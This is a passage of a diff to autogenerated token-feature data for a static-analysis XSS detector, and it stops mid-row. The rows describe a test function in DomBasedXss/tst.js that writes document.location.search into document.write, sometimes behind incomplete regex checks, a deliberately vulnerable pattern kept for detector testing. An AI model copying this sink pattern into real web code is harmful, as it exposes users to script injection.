URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | v.match("^\\\\d+$") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | v.match("^\\\\d+$") | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | v.match("^\\\\d+$") | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | v.match("^\\\\d+$") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:127:9:127:13 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:127:9:127:13 | match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:127:9:127:13 | match | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:127:9:127:13 | match | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:127:9:127:13 | match | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:127:15:127:22 | "^\\\\d+$" | CalleeFlexibleAccessPath | v.match | | autogenerated/Xss/DomBasedXss/tst.js:127:15:127:22 | "^\\\\d+$" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:127:15:127:22 | "^\\\\d+$" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16500,6 +114708,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:127:15:127:22 | "^\\\\d+$" | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:127:15:127:22 | "^\\\\d+$" | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:127:15:127:22 | "^\\\\d+$" | receiverName | v | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:14 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:14 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:14 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:14 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:14 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:20 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:20 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:20 | document.write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:20 | document.write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:20 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | document.write(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | exceptional return of document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | exceptional return of document.write(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | exceptional return of document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | exceptional return of document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:129:7:129:23 | exceptional return of document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:129:16:129:20 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:129:16:129:20 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:129:16:129:20 | write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:129:16:129:20 | write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:129:16:129:20 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:129:22:129:22 | v | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:129:22:129:22 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:129:22:129:22 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16508,6 +114741,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:129:22:129:22 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:129:22:129:22 | v | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:129:22:129:22 | v | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:132:7:132:22 | !(/\\d+/.test(v)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:132:7:132:22 | !(/\\d+/.test(v)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:132:7:132:22 | !(/\\d+/.test(v)) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:132:7:132:22 | !(/\\d+/.test(v)) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:132:7:132:22 | !(/\\d+/.test(v)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:132:8:132:22 | (/\\d+/.test(v)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:132:8:132:22 | (/\\d+/.test(v)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:132:8:132:22 | (/\\d+/.test(v)) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:132:8:132:22 | (/\\d+/.test(v)) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:132:8:132:22 | (/\\d+/.test(v)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:13 | /\\d+/ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:13 | /\\d+/ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:13 | /\\d+/ | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:13 | /\\d+/ | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:13 | /\\d+/ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:18 | /\\d+/.test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:18 | /\\d+/.test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:18 | /\\d+/.test | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:18 | /\\d+/.test | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:18 | /\\d+/.test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | /\\d+/.test(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | /\\d+/.test(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | /\\d+/.test(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | /\\d+/.test(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | /\\d+/.test(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | exceptional return of /\\d+/.test(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | exceptional return of /\\d+/.test(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | exceptional return of /\\d+/.test(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | exceptional return of /\\d+/.test(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:132:9:132:21 | exceptional return of /\\d+/.test(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:132:15:132:18 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:132:15:132:18 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:132:15:132:18 | test | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:132:15:132:18 | test | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:132:15:132:18 | test | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:132:20:132:20 | v | CalleeFlexibleAccessPath | ?.test | | autogenerated/Xss/DomBasedXss/tst.js:132:20:132:20 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:132:20:132:20 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16515,6 +114783,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:132:20:132:20 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | | autogenerated/Xss/DomBasedXss/tst.js:132:20:132:20 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:132:20:132:20 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:10 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:10 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:10 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:10 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:16 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:16 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:16 | document.write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:16 | document.write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:16 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | document.write(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | exceptional return of document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | exceptional return of document.write(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | exceptional return of document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| 